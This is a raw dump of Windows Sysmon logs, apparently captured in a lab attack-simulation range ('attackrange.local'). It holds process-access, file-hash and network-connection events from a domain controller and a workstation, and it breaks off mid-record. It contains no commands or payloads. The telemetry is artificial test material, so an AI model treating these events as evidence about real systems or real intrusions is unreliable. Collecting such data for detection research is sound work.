Firefox\default-browser-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2F720C0B8D1C23B77D77A046757B178A,SHA256=8744CE718E24F9B349B84B21BD2B806B76FEEDD32DB760A566F54C15BAA27466,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.868{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=330BDF34367DB435124D2026C6CD23AA,SHA256=A70A278929D4D369F7048A2EF6FC0B60DC550C621759DDFC57B2E467D4878BAD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.836{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.836{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-0664-60E8-6503-00000000CF01}40242236C:\Windows\system32\csrss.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.799{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4CA-60EB-367D-00000000CF01}7520C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.783{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021C7737D72AF8DDFE3FC55D5ED3A75F,SHA256=07FC24923DA87777068042C829709EB195663CE9F50DDA1AB17D8938517FA27B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:42.521{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00AF6F70CBADF11A2F1CF0D812BAD410,SHA256=8971D09B45FBCFEC68C63065738BF7E06D9D3697334BFC86F0ABF2867DC0E862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B68AA1E2EF1D1A8C16B475DA0E70F10,SHA256=67F9013B489E7AD95305042ECC1D3C8A8BFFF02A94047AE0CFA675383DBB0051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE6ABD22F922FA861C1FF3AD72BCC980,SHA256=A80CCF13009A56991CEA363F25AC5428062BF10DDBA844826E20AAD87D32937F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73179C9BA02E8C58340C323FE61FA6AD,SHA256=A3028DB1E19215F04DD254A2FEF19B2D30DB79B5135FEAE673CAB3FB88D7C471,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:43.537{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F775D26CF09B6FB23EA45FF42683C5B,SHA256=08299AE5AE81F567695BFC9A96707B605201676A1E19EFD481C80E6263D3B3F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.200{466BC892-F4CA-60EB-377D-00000000CF01}6724ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Pending Pings\0460A459-2B40-4601-917A-1BE137E24F51MD5=83D2A6A331CBC744B9A0D3216580C274,SHA256=620F0B1E8D5814531794AA825684127AE85A015E87E2561C84D5A4A423B1E4C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:42.985{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:44.552{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=832AAD459E7504B9E5D7DD1AA85DA39C,SHA256=6E6DEC193952E9EE773BA1FC6E3E0DD9DED8A9C90CDA2F10E928306917E4B0EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.548{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local64910- 354300x80000000000000001048996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.434{00000000-0000-0000-0000-000000000000}7520<unknown process>-tcptruefalse10.0.1.14win-dc-890.attackrange.local51028-false13.224.193.70server-13-224-193-70.fra2.r.cloudfront.net443https 354300x80000000000000001048995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.417{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62465- 23542300x8000000000000000807664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:45.568{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3C1A436F4E4164BB3F0A955CAC2BA83,SHA256=0A6E15BE7D206F96855CD767B6AC327993141D032E92282A9965ECE45B34A14F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:44.232{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57270-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.553{00000000-0000-0000-0000-000000000000}6724<unknown process>-tcptruefalse10.0.1.14win-dc-890.attackrange.local51029-false35.244.247.133133.247.244.35.bc.googleusercontent.com443https 23542300x80000000000000001048998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:44.999{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5963F79461FEA0C54323EF73ABB8FD,SHA256=D22288B450C4F74AE6146C7259BF774FEB767E29046D9C74FF54926882EE8F1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:46.724{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE4764CA9FBE864E6F5587CF2495A869,SHA256=BC55EBB048E3AED22460AF58FEBF9424E95F7B1902D16DEC652D58C634373499,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:37.777{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51030-false10.0.1.12-8000- 23542300x80000000000000001049000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:46.013{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8130AF741DD6B278F0475F3FDB8169AA,SHA256=0E5B46A69F93AC598D605D2BF79E471E923019C27FDF73F3264C5DC5631DABC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:47.725{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B8E093A88D57E4C3D9F17047E870498,SHA256=8CD537494F7134DFDECE2C6216B3CD7FC1A822A808A22F30C37D3B3A46A665EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:47.065{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9B37AC3E68A94E74E5A466B1FEBE4A9,SHA256=3FA97326AB9B00280CF063DA50D55F8660C9995008083985C3C9F9F4EDE6CD0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:48.739{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77712A917564C83EA64223FA63B5573,SHA256=EC45D23403EF594AC7C949931359CBB424E4E346FDA0E0721333219194EE2034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:48.080{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCB55D8A1FF19464C8F4768A20B0BD14,SHA256=2D191938DFC59833B7F376CDE00B4963903667E511AF76112636D9BD984896AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:49.741{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F753C41268DD0F65D153A66AF10E7F49,SHA256=D86EBEF5D9E47B29D9C91371D7A0993C9CD57E479221B9E5DD0892B8E30AC4A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:49.095{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0E857D855561CE23BEF5F6923299596,SHA256=4CE74EB55024D5921BF672B2E0167A16952C1EAFB0E27B47D1804FDF1BFD4315,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:50.741{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1071A49255F27A9C38EB03F3A0804E0A,SHA256=E843CEE76E0BEBA97A879CB8DFBCA711C11D4729D625588BF9BF29ABCD191CE7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D2-60EB-3A7D-00000000CF01}9800C:\Program 